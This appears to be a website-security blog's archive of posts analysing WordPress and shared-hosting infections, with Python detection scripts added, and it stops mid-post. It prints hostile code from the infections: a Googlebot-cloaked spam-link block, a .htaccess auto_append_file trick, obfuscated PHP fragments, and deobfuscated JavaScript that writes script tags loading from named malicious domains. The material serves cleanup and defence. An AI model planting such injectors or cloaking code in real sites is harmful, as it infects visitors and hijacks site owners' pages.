Posts Tagged ‘malicious code’

Spam links in WordPress infected websites

We’ve been seeing a lot of spam links in WordPress index.php files. Even the “silence is golden” 30 byte index.php files sprinkled throughout a WordPress installation have been infected.

These infected websites had other malicious code as well, but the index.php files had variations of the following code:

<!-- /harew-->
<?
$agent = $_SERVER['HTTP_USER_AGENT'];
if(!eregi("google",$agent))
{
?>
<div style="position:absolute; top:-99999px;">
<?
}
?>
bedava <a href="http://sikisizleriz.blogspot.com/">sikis</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle
bedava <a href="http://bedavapornocu.blogspot.com/">porno</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle
bedava <a href="http://http://grupsikisizle.blogspot.com/">sex</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle
bedava <a href="http://fulllezizle.blogspot.com/">lezbiyen</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle
bedava <a href="http://sikisizlex.blogspot.com/">sikis</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle
free <a href="http://freefullsex.blogspot.com/">sex</a> videos
free <a href="http://freesexfull.tumblr.com/">sex</a> videos
</div>

Currently we see about 12,000+ websites infected with this code. These sites are usually infected with a variety of .htaccess file infections as well, so just removing this code will not clean your website.

For instance, many of them have this in their .htaccess files:

php_value auto_append_file /home/path_to_/public_html/websitename/Thumbs.db

This appends whatever is in the Thumbs.db file to every PHP page as it is rendered. Because the PHP code in Thumbs.db runs at that point, the infectious code shows up when you view the source of an infected web page, but when you look at the raw code of the index file, the code isn’t there.

This line is usually preceded by many, many blank lines in an attempt to hide it. Inside the Thumbs.db file is code like:

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSK…;$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

Which is the infectious code delivered to any web page rendered from the folder with the above .htaccess file.
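The two tells described above, the cloaked off-screen div in index.php and an auto_append_file directive buried under blank lines in .htaccess, can be checked for with a small scanner. This is an added example rather than code from the post; the files it scans are constructed samples it writes to a temporary directory.

```python
import os
import re
import tempfile

Q = "['\"]"  # a single or double quote in PHP/HTML source

# Cloaking check seen in the infected index.php: read the user agent, then skip the
# hidden block for Google (eregi) so only human visitors get the off-screen links.
UA_CLOAK_RE = re.compile(
    r"\$_SERVER\s*\[\s*" + Q + r"HTTP_USER_AGENT" + Q + r"\s*\].*?eregi\s*\(\s*" + Q + "google" + Q,
    re.S | re.I)
# A div pushed thousands of pixels off the top of the page.
OFFSCREEN_DIV_RE = re.compile(r"<div[^>]*style\s*=\s*" + Q + r"[^'\"]*top\s*:\s*-\d{4,}px", re.I)
# The .htaccess directive that appends (or prepends) a file to every PHP response.
# [ \t]* rather than \s* so the match starts on the directive's own line, not on a blank one.
AUTO_APPEND_RE = re.compile(r"^[ \t]*php_value[ \t]+auto_(append|prepend)_file[ \t]+(\S+)", re.I | re.M)


def scan_index(text):
    """Return the indicators found in an index.php/html file."""
    findings = []
    if UA_CLOAK_RE.search(text):
        findings.append("user-agent cloaking (eregi google)")
    if OFFSCREEN_DIV_RE.search(text):
        findings.append("off-screen div")
    return findings


def scan_htaccess(text):
    """Return auto_*_file directives with their line number (the padding makes them easy to miss)."""
    findings = []
    for m in AUTO_APPEND_RE.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        findings.append(f"auto_{m.group(1)}_file {m.group(2)} at line {line_no}")
    return findings


def scan_tree(root):
    """Walk a WordPress tree; return {relative path: [findings]} for files that hit."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == ".htaccess":
                hits = scan_htaccess(text)
            elif name.lower() in ("index.php", "index.html", "index.htm"):
                hits = scan_index(text)
            else:
                continue
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report


def build_sample_tree(root):
    """Constructed sample files (not from a real site) in the shapes the post describes."""
    plugin_dir = os.path.join(root, "wp-content", "plugins")
    os.makedirs(plugin_dir)
    # Clean 30-byte "silence is golden" placeholder: must not be flagged.
    with open(os.path.join(plugin_dir, "index.php"), "w") as fh:
        fh.write("<?php\n// Silence is golden.\n")
    # Infected index.php: user-agent check plus a div pushed off-screen.
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<!-- /harew-->\n<?\n$agent = $_SERVER['HTTP_USER_AGENT'];\n"
                 "if(!eregi(\"google\",$agent))\n{\n?>\n"
                 "<div style=\"position:absolute; top:-99999px;\">\n<?\n}\n?>\n"
                 "free <a href=\"http://spam.example/\">links</a>\n</div>\n")
    # .htaccess with the directive hidden behind a run of blank lines.
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("RewriteEngine On\n" + "\n" * 40 +
                 "php_value auto_append_file /home/example/public_html/Thumbs.db\n")


def demo():
    """Build the constructed tree, scan it and return the report."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, "->", "; ".join(hits))
```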

There doesn’t appear to be any common characteristic of the websites infected with this, other than that the infected websites we’ve cleaned have all been WordPress. They were already at the current version; some have the vulnerable timthumb.php files, some don’t. Some are using FCKeditor in one way or another, and we have seen this as a successful attack vector for quite a while.

If you have this type of infection, please post a comment with any other information you may have regarding this. Mostly, what plugins you have on your site. Maybe then as a community we can zero in on the root cause.

If you found this post useful or informative, please Tweet about us, like us on Facebook, or just post a comment.

As always, if you need help cleaning this from your website, please send me an email: traef@wewatchyourwebsite.com.

Thank you.

WordPress plugin wp-phpmyadmin should be removed

If anyone reading this blog has wp-phpmyadmin installed on their site you should remove it immediately.

For the past 2 months we’ve been seeing more and more websites with this plugin being infected.

There is usually a file added, upgrade.php, that is not part of the legitimate files and has various malicious code inside.

This plugin is no longer on the WordPress plugin repository as it has not been updated since 2007.

While a plugin like this might seem more convenient for database work than using your hosting provider’s control panel, it’s also more convenient for hackers.

We did a Google search on this and found that the majority of websites with this plugin also don’t have any prevention for viewing the directory it is installed in.

This means that a hacker can click on “Parent Directory” and see all the plugins installed. While this isn’t a huge vulnerability, it’s so easy to prevent with either a .htaccess file or an empty index.html file.

The less information a hacker knows about your website the better off you are.

What about you? Do you have this installed on your website? Are there other plugins you worry about? Leave a comment here and we’ll investigate it.

Need your website cleaned, protected and monitored? Send us an email: support@wewatchyourwebsite.com

toobarcom, mybar, adsnet infections

Over the past week or so, we’ve been fighting a new website infection. At first, it appeared to be infecting just one hosting provider, but as we investigated further, we found it was affecting websites on many hosting providers. I’m sorry that it’s taken so long to write about this but we’ve been seeing various new backdoors added to sites and I wanted to fully analyze those before writing this.

What we’re seeing is a malscript inserted either immediately before the legitimate code in certain .js (JavaScript) files or inserted in HTML and PHP files. If it’s in a .js file, you have to be careful because it appears to be part of the entire JavaScript code. There are no spaces or line breaks between the malicious code and the legitimate code.

In .html and .php files we’ve usually seen it enclosed by ‘ads’ tags and script tags.

We’ve seen two variations of the malicious code:

The first one starts with:

var st1 = ;this.b=this.M="";this.A="";this.w=false;""...

and ends with:

var gr0=0;

The second starts with: var st1 = 0;document. write( unescape('%3C%73...

and ends with:

gr0=0;

We’ll examine each one here to let you know what they’re doing.

The first one deobfuscates to this:

var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.", "lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.", "rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."], f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length); dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+ escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document. write ('(script tag) src=" hxxp: // '+e[g]+d[f]+'/system/caption.js" type="text/javascript">(script tag)

When looking at this code, you’ll see that it checks the visitor’s user agent against a variety of search-engine strings:

  • yahoo
  • search
  • msnbot
  • yandex
  • googlebot
  • bing
  • ask

Then it creates an array of domains:

  • myads.name
  • adsnet.biz
  • toolbarcom.org
  • mybar.us
  • freead.name

and then creates an array of prefixes:

  • axe.
  • box.
  • cox.
  • dex.
  • fax.
  • fix.
  • fox.
  • gox.
  • hex.
  • kex.
  • lax.
  • lex.
  • lox.
  • lux.
  • max.
  • mix.
  • nix.
  • oxo.
  • oxy.
  • pax.
  • pix.
  • pox.
  • pyx.
  • rax.
  • rex.
  • sax.
  • sex.
  • six.
  • sox.
  • tax.
  • tux.
  • vex.
  • vox.
  • wax.
  • xis.
  • zax.

When you consider the number of possible combinations of domains and subdomains, it becomes quite clear that the hackers were looking to hide their locations.

The final part of the code puts it all together and adds a little more to the URL:

document. write(' (script tag) src="hxxp : //'+e[g]+d[f]+'/system/caption.js" type="text/javascript">(script tag)

adding the ‘/system/caption.js’ to the end of whatever domain string it’s built.

So a typical string after this first code is decoded might look like:

(script tag) type="text/javascript" src="hxxp: //mix.freead.name/system/caption.js"> (script tag)

The second obfuscated string from above uses the same basic methodology but uses these domains:

  • edisonsnightclub.com
  • gaindirectory.org
  • ideacoreportal.com
  • karenegren.com

and appends one of these strings to the front:

  • aqua.
  • azure.
  • black.
  • blue.
  • brown.
  • chocolate.
  • coral.
  • cyan.
  • darkred.
  • fuchsia.
  • gold.
  • gray.
  • green.
  • indigo.
  • ivory.
  • khaki.
  • lime.
  • magenta.
  • maroon.
  • navy.
  • olive.
  • orange.
  • pink.
  • plum.
  • purple.
  • red.
  • silver.
  • snow.
  • violet.
  • white.
  • yellow.

This malscript creates a document.write string that uses one of the above prefixes, one of the above domains and adds ‘/data/mootools.js’ to the end to complete the malscript.

If you’re looking for this malscript in your website, please make sure you grab the entire line all the way to ‘var gr0=0;’ (without the quotes) and nothing more. Otherwise, your legitimate code won’t function properly and you’ll have to restore from backup. Which may not be a bad thing, unless, of course, you don’t have a good backup.
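As an added example (not code from the post), the two prefix/domain arrays from the deobfuscated scripts become a checker: it enumerates every host the malscript can build, finds script tags pointing at any of them, and strips the injected span from ‘var st1 = ’ through ‘gr0=0;’ and nothing more, so the legitimate code glued to it survives. The HTML and .js samples are constructed.

```python
import re

# Arrays from the first deobfuscated variant: random prefix + random domain + /system/caption.js
DOMAINS_1 = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"]
PREFIXES_1 = ["axe.", "box.", "cox.", "dex.", "fax.", "fix.", "fox.", "gox.", "hex.", "kex.",
              "lax.", "lex.", "lox.", "lux.", "max.", "mix.", "nix.", "oxo.", "oxy.", "pax.",
              "pix.", "pox.", "pyx.", "rax.", "rex.", "sax.", "sex.", "six.", "sox.", "tax.",
              "tux.", "vex.", "vox.", "wax.", "xis.", "zax."]
# Arrays from the second variant: colour prefix + domain + /data/mootools.js
DOMAINS_2 = ["edisonsnightclub.com", "gaindirectory.org", "ideacoreportal.com", "karenegren.com"]
PREFIXES_2 = ["aqua.", "azure.", "black.", "blue.", "brown.", "chocolate.", "coral.", "cyan.",
              "darkred.", "fuchsia.", "gold.", "gray.", "green.", "indigo.", "ivory.", "khaki.",
              "lime.", "magenta.", "maroon.", "navy.", "olive.", "orange.", "pink.", "plum.",
              "purple.", "red.", "silver.", "snow.", "violet.", "white.", "yellow."]
# Paths both variants append to the host they build.
SCRIPT_PATHS = {"/system/caption.js", "/data/mootools.js"}


def generated_hosts(prefixes, domains):
    """Every host the script can build: one prefix from e[] in front of one domain from d[]."""
    return {p + d for p in prefixes for d in domains}


ALL_HOSTS = generated_hosts(PREFIXES_1, DOMAINS_1) | generated_hosts(PREFIXES_2, DOMAINS_2)

# <script ... src="http://host/path">; the scheme is optional, as in the decoded document.write.
SCRIPT_SRC_RE = re.compile(
    r"""<script[^>]*\bsrc\s*=\s*['"]?(?:https?:)?//([^/'"\s>]+)(/[^'"\s>]*)""", re.I)


def find_generated_script_tags(html):
    """(host, path) for each script tag whose host is a generated combination or whose
    path is one of the two the malscript appends (catches a domain not yet on the list)."""
    return [(h.lower(), p) for h, p in SCRIPT_SRC_RE.findall(html)
            if h.lower() in ALL_HOSTS or p in SCRIPT_PATHS]


# The injected span starts with "var st1 = " and ends with "gr0=0;" ("var gr0=0;" in the first
# variant). Non-greedy so it stops at the first terminator and takes none of the legitimate code.
MALSCRIPT_RE = re.compile(r"var st1 = .*?gr0=0;", re.S)


def strip_malscript(text):
    """Remove every injected span; return (cleaned text, number of spans removed)."""
    return MALSCRIPT_RE.subn("", text)


# Constructed samples (shape only; the obfuscated body is elided).
SAMPLE_JS = ("var st1 = 0;document.write(unescape('%3C%73%63%72%69%70%74'));var gr0=0;"
             "function legit(){return 1;}")
SAMPLE_HTML = ('<html><head><script src="/js/app.js"></script>'
               '<script type="text/javascript" src="http://mix.freead.name/system/caption.js"></script>'
               '</head></html>')

if __name__ == "__main__":
    print(len(ALL_HOSTS), "possible hosts")
    print(find_generated_script_tags(SAMPLE_HTML))
    print(strip_malscript(SAMPLE_JS))
```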

We’re still investigating how this infection starts. At first we thought it was WordPress based sites only. Then we realized that it was also infecting non-WordPress sites. It might be the old compromised FTP credentials, but we haven’t been able to gather all our data yet. When we do, we’ll post an update here.

We’re also going to post about the backdoors we’ve found and you can search your site for them as well.

Until then, if you’re infected with this or if Google shows any of these domains in your Safe Browsing Diagnostic report (http://www.google.com/safebrowsing/diagnostic?site=), and you’d like us to clean it for you, please send me an email at traef@wewatchyourwebsite.com

Thank you.

The new Attack – d0lphin.biz

We recently came across a number of websites that have been injected with malscript iframes that load malware from d0lphin.biz. Following is our report on this attack.

Cybercriminals appear to be using their network of infected PCs to modify “hacked” websites and turn them into infectious websites, attempting to infect many more PCs.

This attack appears to only infect index pages: index.htm, index.html, index.php. That’s all we’ve seen thus far.

The malicious code that gets injected into these webpages is the following:

[image: body of injected script]

Which deobfuscates to:

[image: deobfuscated script]

The usual iframe malscript parameters: width=1, height=1 style=’visibility:hidden’

What was interesting is that we had to use a valid browser user agent to obtain the in.php file. We used: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0) as our user-agent string. Other similar user-agents worked as well, but they had to be MSIE and Windows compatible, so we knew it had to be a Microsoft specific exploit they (the hackers) were attempting on unsuspecting visitors.

You’ll see from the above iframe that the file it references is in.php. Here is the code for in.php:

[image: in.php malscript]

Which deobfuscates to:

[image: in.php deobfuscated]

As you can see, there are 2 other files that this malscript tries to load:

load.php (which is actually a Windows executable)

and

pdf.php (which is an actual PDF file that uses ActionScript to try and infect the visitor’s PC).

At the time of our investigation, the malware load.php was only detectable by 2 out of 41 anti-virus companies. Here is the VirusTotal report on that little gem:

[image: load.php VirusTotal results]

And pdf.php was detectable by 11 out of 41 anti-virus programs. Here is the VirusTotal report on that file:

[image: pdf.php VirusTotal results]

Inspecting the FTP log files for the infected website we found that the majority of the FTP traffic on the day the infected files were modified was from the following IP addresses:

  • 89.36.84.249 (Bucharest, Romania)
  • 98.209.145.133 (Michigan, United States)
  • 74.211.69.79 (New Mexico, United States)
  • 85.122.6.86 (Bucharest, Romania)
  • 123.236.139.33 (India)
  • 91.105.112.220 (Great Britain, United Kingdom)
  • 96.20.117.224 (Montreal, Canada)
  • 119.171.100.108 (Tokyo, Japan)
  • 71.65.72.159 (Ohio, United States)
  • 97.84.174.241 (Michigan, United States)

The interesting thing about this FTP traffic from various places around the world is that the exact same FTP username and password were used. There weren’t any failed login attempts with this username for the prior 6 months so we didn’t feel it was a brute force or dictionary attack on a weak password. This leads us to believe that this infection is another case of compromised FTP credentials.

Another interesting point is that the FTP traffic from these various IP addresses happened within minutes of each other and the number of files transferred from each IP address was 2. It appears from this information that the attackers were using a distributed network of compromised PCs (read botnet) to send the modified files to the website server.
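The reasoning in the last two paragraphs, one account uploading from many client IPs within minutes, a fixed couple of files per client and no failed logins beforehand, can be turned into a check over an FTP log. This is an added example, not the post’s own analysis tool; the log format and its lines are constructed, with documentation-range IPs standing in for the bots.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed FTP transfer/auth log (not a real server's log): timestamp, account, client IP,
# event, path. Documentation-range IPs stand in for the botnet clients.
SAMPLE_LOG = """\
2009-05-12 03:14:07 siteowner 192.0.2.10 PUT /public_html/index.php
2009-05-12 03:14:09 siteowner 192.0.2.10 PUT /public_html/index.html
2009-05-12 03:16:41 siteowner 198.51.100.20 PUT /public_html/blog/index.php
2009-05-12 03:16:43 siteowner 198.51.100.20 PUT /public_html/blog/index.html
2009-05-12 03:19:02 siteowner 203.0.113.30 PUT /public_html/shop/index.php
2009-05-12 03:19:05 siteowner 203.0.113.30 PUT /public_html/shop/index.htm
2009-05-12 14:02:10 siteowner 192.0.2.77 PUT /public_html/news.html
2009-05-12 15:30:00 designer 198.51.100.9 LOGIN_FAILED -
2009-05-12 15:30:20 designer 198.51.100.9 PUT /public_html/style.css
"""


def parse_log(text):
    """One tuple (timestamp, user, ip, event, path) per non-empty line."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, time, user, ip, event, path = line.split(maxsplit=5)
        events.append((datetime.fromisoformat(f"{date} {time}"), user, ip, event, path))
    return events


def failed_login_count(events, user):
    """Brute-force and dictionary attacks leave failures behind; a stolen password does not."""
    return sum(1 for _, u, _, event, _ in events if u == user and event == "LOGIN_FAILED")


def distributed_upload_accounts(events, window=timedelta(minutes=15), min_ips=3):
    """Accounts whose uploads arrive from >= min_ips distinct client IPs inside one window.
    The result also carries uploads per IP: a fixed small number per client (2 in the post)
    is the signature of many bots each dropping the same files."""
    by_user = defaultdict(list)
    for ts, user, ip, event, _ in events:
        if event == "PUT":
            by_user[user].append((ts, ip))
    flagged = {}
    for user, uploads in by_user.items():
        uploads.sort()
        for i, (t0, _) in enumerate(uploads):
            in_window = [(t, ip) for t, ip in uploads[i:] if t - t0 <= window]
            if len({ip for _, ip in in_window}) >= min_ips:
                per_ip = defaultdict(int)
                for _, ip in in_window:
                    per_ip[ip] += 1
                flagged[user] = {"window_start": t0, "uploads_per_ip": dict(per_ip),
                                 "failed_logins": failed_login_count(events, user)}
                break
    return flagged


if __name__ == "__main__":
    for user, info in distributed_upload_accounts(parse_log(SAMPLE_LOG)).items():
        print(user, info)
```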

This could be for a number of reasons.

But the one reason that seems most obvious is that the attackers know many people try to block their IP addresses. By using a botnet of remotely controlled PCs a website owner would have to block dynamic IP addresses. Would you block a range of IP addresses from a DSL connection in the United States? Probably not.

Having a website means handling traffic from visitors all over the world. If you’re going to start blocking groups of IP addresses, how will you know when you’re blocking innocent visitors? Wouldn’t that hurt your business?

The IP address that d0lphin.biz is hosted on shows this for its whois:

[image: whois for the d0lphin.biz IP address]

The whois on the domain d0lphin.biz is:

[image: whois for the domain d0lphin.biz]

Google’s report on the network hosting d0lphin.biz shows:

[image: Google diagnostics for the network]

FIRE’s maliciousnetworks.org shows this information for the network d0lphin.biz is hosted on:

[image: FIRE report on the d0lphin.biz network]

You can see that their report shows 2 C&C servers (Command and Control, the servers hackers use to control their botnets) and 2 exploit servers, both bad stuff.

Prevention of this type of attack on your website is simple. Keep your PCs clean of viruses. If you want to be sure your PC is clean, don’t use an administrator account for your daily activities. If you can’t install software as your currently logged-in user, neither can a virus.

What are your thoughts on this new attack? Is there any further information you’d like to know? Let me know…

Another Round of Beladen? Or, The New "Go" Infection

On Wednesday July 22, 2009 we started seeing what looks to be a new round of beladen style website infections by cybercriminals.

The reason we think they’re beladen style is that they appear to infect all the websites on shared servers, and they also seem to be remotely controlled in an “on as needed” mode.

This infection resulted in thousands more sites being tagged with Google’s “This site may harm your computer”.

According to Google Diagnostics for certain websites we were asked to help with, this is what was shown:

“Malicious software is hosted on 4 domain(s), including: ventsol.info/, ina6co.com/, goscansoon.com/.”

Other sites we were asked to help with were also showing these domains in their Google Diagnostics:

  • daobrains.info/
  • safetyshareonline.com/
  • goslimscan.com/
  • goscansome.com/
  • globalsecurityscans.com/

Our scanners were detecting suspicious obfuscated javascript on the sites we were helping with, but it appeared to only be setting cookies to expire the following day. The obfuscated javascript was this:

[image: malscript-0-11 (obfuscated cookie-setting javascript)]

Which deobfuscated looks like:

sessionid=39128605A531; path=/; expires=Thu, 23 Jul 2009 18:42:32 GMT

We found similar code with various names for the “var” part (replacing oigmlob) above in the obfuscated code. Other names were:

  • dtxzidl
  • bmno
  • wcdg
  • tpet
  • stqfpbc
  • meuhgor

In addition, we also saw various combinations of hexadecimal escapes replacing the actual letters. For instance, instead of pa\x74h=/\x3b ex\x70ir\x65s we found these as well:

  • p\x61th=/\x3b exp\x69r\x65s
  • p\x61\x74h=/\x3b \x65x\x70i\x72es
  • p\x61t\x68=/\x3b expi\x72e\x73

All of these deobfuscate to: path=/; expires
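Both the Thumbs.db code in the first post and the cookie-setting script here hide text behind \xNN hex and \NNN octal escapes, and the toolbarcom variant goes through unescape('%3C%73...'). This added decoder (not from the post) handles all three forms so the spellings can be compared after normalisation; the cookie fragments are the page’s own, the document.cookie line is constructed.

```python
import re

# \xNN (hex), \NNN (octal, 1-3 digits) and %NN (JavaScript unescape) forms.
ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\([0-7]{1,3})|%([0-9A-Fa-f]{2})")


def decode_escapes(s):
    """Replace every escape with the character it stands for; other text is left alone."""
    def repl(m):
        hex_js, octal, pct = m.groups()
        if hex_js is not None:
            return chr(int(hex_js, 16))
        if octal is not None:
            return chr(int(octal, 8))
        return chr(int(pct, 16))
    return ESCAPE_RE.sub(repl, s)


# The four spellings of the same cookie attributes quoted in the post.
COOKIE_VARIANTS = [
    r"pa\x74h=/\x3b ex\x70ir\x65s",
    r"p\x61th=/\x3b exp\x69r\x65s",
    r"p\x61\x74h=/\x3b \x65x\x70i\x72es",
    r"p\x61t\x68=/\x3b expi\x72e\x73",
]


def normalise(variants):
    """Distinct plain-text forms; a single entry means the variants differ only in escaping."""
    return {decode_escapes(v) for v in variants}


def looks_like_cookie_setter(script):
    """After decoding, does the script set a cookie with a path and an expiry, the way the
    first stage of this infection does?"""
    decoded = decode_escapes(script)
    return "document.cookie" in decoded and "path=/" in decoded and "expires" in decoded


# Constructed line in the shape of the decoded first stage (the cookie value is the post's).
SAMPLE_SETTER = (r'document.cookie="sessionid=39128605A531; p\x61th=/\x3b '
                 r'exp\x69r\x65s=Thu, 23 Jul 2009 18:42:32 GMT";')

if __name__ == "__main__":
    print(normalise(COOKIE_VARIANTS))
    print(decode_escapes(r"\x65\143\x72\160"), decode_escapes("%3C%73%63%72%69%70%74"))
    print(looks_like_cookie_setter(SAMPLE_SETTER))
```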

One common theme was the hosting providers. Wouldn’t you know it: a day after we blogged about how wrongly accused many hosting providers are for the gumblar, martuz and iframe infections, they actually become the target.

It appears that these recent infections are a server issue and not just a specific website on a shared server. How the server became infected is purely speculation. Could it have been from one set of compromised FTP credentials that was able to infect the server and then control other sites as well? Could it have been SQL injection for one site that then gave the attackers a method to start a process on the server thereby controlling all the websites on that server?

Who knows. At this point all we do know is that this does affect all the websites on infected servers.

How do we know that?

We created a program for situations like this. It grabs a list of all the websites for a specific IP address and starts checking them. On some IP addresses 91% of the websites were showing the obfuscated cookie code from above. Our thought is that since this is an “on again – off again” type of infection, the other 9% were dormant when our program scanned those sites.

Another interesting observation was that for a specific IP address, each website showed the exact same obfuscated code. While websites on different IP addresses had similar obfuscated code with the slight variations mentioned previously.

The first step in this “drive-by” infection was to set a cookie on the visitor’s PC. Then if that same visitor came back within the expiration period of the cookie (24 hours), this would be delivered to their browser:

[image: malscript-1-1]

Which essentially does a meta tag redirect. The above deobfuscates to:

[image: malscript-2-1]

We did see some of the other domains mentioned earlier in place of safetyshareonline.com and the goscansoon.com.

The whole purpose of this attack is to infect the PCs of visitors to these websites. This is done with this bit of social engineering code:

[image: malscript-3-1]

This code uses some fake graphics (okay the graphics are real, but they’re not the “official” graphics of Microsoft) in an attempt to trick the visitor into believing they have a virus. The code starts by checking to see if the operating system on the visitor’s PC is Microsoft’s Vista. If it is, it displays “Vista” looking graphics. If not Vista, then it assumes Windows XP and shows different graphics.

No matter who you are or what operating system and browser you have, this code shows a window that looks like a “Windows Security Center” window and it informs you that:

“Virus (I-Worm.Trojan.b) was found on your computer! Click OK to install System Security Antivirus.” If you select “OK” from their screen it will download their “antivirus”.

If you cancel, a new alert is displayed with this message:

“Windows Security Center recommends you to install System Security Antivirus.”

If you cancel that, it will display again.

One more cancel gets you to this message:

“Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it to secure your PC”

This is some very elaborate scheming by hackers and cybercriminals just to get visitors to download their “mother lode of infectious code”, but it will probably work on many people.

We decided to show the code here, although the code is inserted graphic files, so that if your website starts being tagged as suspicious by Google with some of the domains listed here, and you get the “This site may harm your computer” moniker, you can compare this code to some of the code you might see in your site and have a better understanding of what is going on.

What To Do

First you need to contact your hosting provider. Have them read this blog post so they can also better understand what’s going on.

Have them check at the server level for unusual processes running on the server. If you’d like, have them contact us and we can help them diagnose this further. We can show them the other websites on your server that are also infected with the exact same code.

At this point we still don’t know how the server gets infected. Be prudent and scan your PCs with a different anti-virus than what you’re currently using. Why? Because if you are infected and you have anti-virus already installed, then it’s obvious that the virus knows how to evade detection of your current security.

We’ve had good success with AVG, Avast or Avira. If you already have one of those installed, then use one of the others. You need to use something different. Scan and clean all PCs with FTP access to your site.

Then change FTP passwords on all of your accounts.

This will have to be done as soon as you start seeing these infections as it may take some time to fully investigate and remediate – so don’t be late (sorry, it’s been a long few days).

Post comments below if you’ve been infected by this or know someone who has.

Thank you.

Friday July 24, 2009 update: We worked with a couple of different hosting providers who had servers infected with this, and it appears the way these malscripts are injected into the webpages is through a process on the server. The cybercriminals have cleverly named this process “crontab”; however, this process runs under the user name “nobody”, typically the same user name that Apache (or httpd) runs as.

The file that executes this process is remotely deleted by the cybercriminals controlling it so it just runs in memory. Once the server is rebooted, the process disappears and doesn’t appear to return. The hosting providers also mentioned implementing suPHP as an aid to blocking this from happening again.

This is quite clever, as how many times does a shared server really get rebooted? Probably not very often, unless there’s a reason to shut down numerous (hundreds?) websites all at once.
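The update above gives two host-level tells: a process whose executable has been deleted from disk, and something named crontab running as the web-server user. This added example (not the hosting providers’ or the post’s tooling) checks a process table for both; it reads /proc on a live Linux server and ships with a constructed sample table.

```python
import os

WEB_USERS = ("nobody", "www-data", "apache", "httpd")


def classify(user, comm, exe_target, web_users=WEB_USERS):
    """Reasons a process matches the pattern in the update, or [] if it looks ordinary.
    A '(deleted)' exe is also seen after a normal package upgrade, so treat it as a lead
    to confirm (owner, start time, open sockets) rather than as proof on its own."""
    reasons = []
    if exe_target.endswith(" (deleted)"):
        reasons.append("executable removed from disk, process still running from memory")
    if user in web_users and comm == "crontab":
        reasons.append(f"process named '{comm}' runs as web-server user '{user}'")
    return reasons


def collect_processes():
    """(pid, user, comm, exe target) for each process, read from /proc.
    Assumes Linux; run as root, otherwise other users' exe links are unreadable and skipped."""
    import pwd  # Unix only
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            user = pwd.getpwuid(os.stat(f"/proc/{pid}").st_uid).pw_name
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            exe_target = os.readlink(f"/proc/{pid}/exe")
        except (OSError, KeyError):  # exited, kernel thread, no permission, unknown uid
            continue
        procs.append((pid, user, comm, exe_target))
    return procs


def find_suspicious(procs):
    """{pid: [reasons]} for processes that match."""
    report = {}
    for pid, user, comm, exe_target in procs:
        reasons = classify(user, comm, exe_target)
        if reasons:
            report[pid] = reasons
    return report


# Constructed process table (not from a real server) in the shape the update describes.
SAMPLE_PROCS = [
    (812, "root", "cron", "/usr/sbin/cron"),
    (2014, "nobody", "httpd", "/usr/sbin/httpd"),
    (3190, "nobody", "crontab", "/tmp/.x/crontab (deleted)"),
]

if __name__ == "__main__":
    # Swap SAMPLE_PROCS for collect_processes() on a live Linux server.
    for pid, reasons in find_suspicious(SAMPLE_PROCS).items():
        print(pid, "; ".join(reasons))
```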

Keep posted, we’ll be adding more information as we get it.

A New Spin on martuz Website Infection

We were tasked with helping a website owner find all the malscripts on his site and remove them. He, like many, learned that his site was an infectious website delivering malicious code with an email from Google.

This website owner had tried removing the code himself from the infected webpages and yet his site was still blacklisted by Google. This was killing his sales, as anyone visiting with Firefox or Chrome as their browser was greeted with a big warning:

This site may harm your computer.

After about a week of trying to rectify the problem himself, he contacted us.

He provided us FTP access to his site so we could tackle it.

After downloading his site (which literally took 3 hours) we started scanning. We grep’d for the word “base64_decode” and found over 228 php files all with the following malscript:

